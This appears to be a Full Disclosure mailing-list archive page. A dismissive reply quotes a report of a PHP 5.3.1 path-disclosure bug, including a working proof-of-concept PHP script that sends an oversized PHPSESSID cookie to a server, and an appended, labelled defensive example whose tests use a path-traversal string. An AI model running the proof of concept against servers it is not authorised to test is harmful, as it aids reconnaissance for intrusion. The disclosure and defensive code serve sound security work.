Full Disclosure mailing list archives
Re: Path disclosure in PHP 5.3.1
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sun, 27 Dec 2009 17:01:59 +1100
Oh no, a full path!

2009/12/27 WHK <www.kernel32 () gmail com>
Make a script vulnerable:

<?php
session_start();
if ($_SESSION) echo $_SESSION; else $_SESSION = 'xx';
?>

Now open the script in your browser, change the value of the cookie "PHPSESSID" to 300 "a" characters and see the disclosure:

Warning: session_start() [function.session-start]: open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php on line 3

PoC:

<?php
error_reporting(0);

// Raw HTTP request carrying an oversized session id; header lines end in
// CRLF and the request is terminated by an empty line.
$payload = 'GET / HTTP/1.1' . "\r\n"
    . 'Host: 127.0.0.1' . "\r\n"
    . 'Connection: close' . "\r\n"
    . 'Cookie: PHPSESSID=' . str_repeat('a', 500) . ';' . "\r\n"
    . "\r\n";

$retorno = '';
if (!$handle = fsockopen('127.0.0.1', 80)) {
    die('Error');
} else {
    fputs($handle, $payload);
    while (!feof($handle)) {
        $retorno .= fread($handle, 1024);
    }
    fclose($handle);
    echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
}
?>

If the value of the cookie is "aaaaaaa", the file in the server's temp directory is "sess_aaaaaaa"; if the value of the cookie is "a" x 300, it does not create the file and returns the error message.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
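The following is an added defensive example for the issue WHK describes; it is not code from the thread, from WHK or from Jeff Williams. It assumes the default cookie name "PHPSESSID", the files save handler (session.save_handler=files) that produces the "/tmp/sess_..." path in the quoted warning, and PHP 5.3-era syntax. It shows the two things a site operator controls: warnings are never rendered to the client (the full path only leaks because display_errors is on), and a client-supplied session id that PHP could never have generated is discarded before session_start() tries to open a file named after it.

```php
<?php
// Added example (not code from the thread): defensive session bootstrap for
// the path-disclosure issue described above. Assumptions: cookie name
// "PHPSESSID" (PHP default), session.save_handler=files, PHP 5.3 syntax.

// Warnings must never reach the browser in production; the quoted warning
// leaks /opt/lampp/htdocs/test.php only because display_errors is on.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// True when $id looks like an id PHP itself would have generated: only the
// characters PHP uses for session ids, and a length PHP would produce
// (22 to 40 characters covers md5/sha1 with 4, 5 or 6 bits per character).
// A 300-character id fails here instead of ever reaching open().
function is_plausible_session_id($id)
{
    return is_string($id) && preg_match('/^[A-Za-z0-9,-]{22,40}$/', $id) === 1;
}

// Mint a fresh 40-hex-character id for a client whose cookie was rejected.
function fresh_session_id()
{
    return sha1(uniqid(mt_rand(), true));
}

// Drop a malformed client-supplied id before session_start() so PHP never
// attempts to open "/tmp/sess_" followed by client-chosen bytes.
// Returns the id actually in use, which is handy for logging.
function safe_session_start()
{
    $name = session_name();
    if (isset($_COOKIE[$name]) && !is_plausible_session_id($_COOKIE[$name])) {
        $peer = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
        error_log('rejected malformed session id from ' . $peer);
        unset($_COOKIE[$name]);            // PHP takes the id from $_COOKIE
        session_id(fresh_session_id());    // replace it before the session opens
    }
    session_start();
    return session_id();
}

// Offline check of the classifier against constructed cookie values
// (no web server needed). The values are made up for this example.
function demo_checks()
{
    $samples = array(
        '0123456789abcdef0123456789abcdef' => 'normal md5-style id',
        str_repeat('a', 300)               => '300 x "a", the id from the post',
        '../../etc/passwd'                 => 'path characters',
        ''                                 => 'empty cookie',
    );
    $out = array();
    foreach ($samples as $id => $label) {
        $verdict = is_plausible_session_id($id) ? 'accept' : 'reject';
        $out[] = sprintf('%-35s %s', $label, $verdict);
    }
    return $out;
}

if (PHP_SAPI === 'cli') {
    // Run from the command line to see the verdict for each sample.
    echo implode("\n", demo_checks()), "\n";
} else {
    safe_session_start();
}
```

Run from the CLI the script only prints the four verdicts (the first sample is accepted, the other three rejected); under a web server it replaces the plain session_start() call in the vulnerable script. Turning off display_errors is the direct fix for the disclosure itself, since whatever else goes wrong inside session_start() the path then goes to the error log rather than the response; the id check is the belt to that braces, because it stops the failed open() from happening at all and gives the log a clear signal that someone is tampering with the cookie.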
Current thread:
- Path disclosure in PHP 5.3.1 WHK (Dec 26)
- Re: Path disclosure in PHP 5.3.1 Jeff Williams (Dec 26)
- <Possible follow-ups>
- Re: Path disclosure in PHP 5.3.1 Gynvael Coldwind (Dec 28)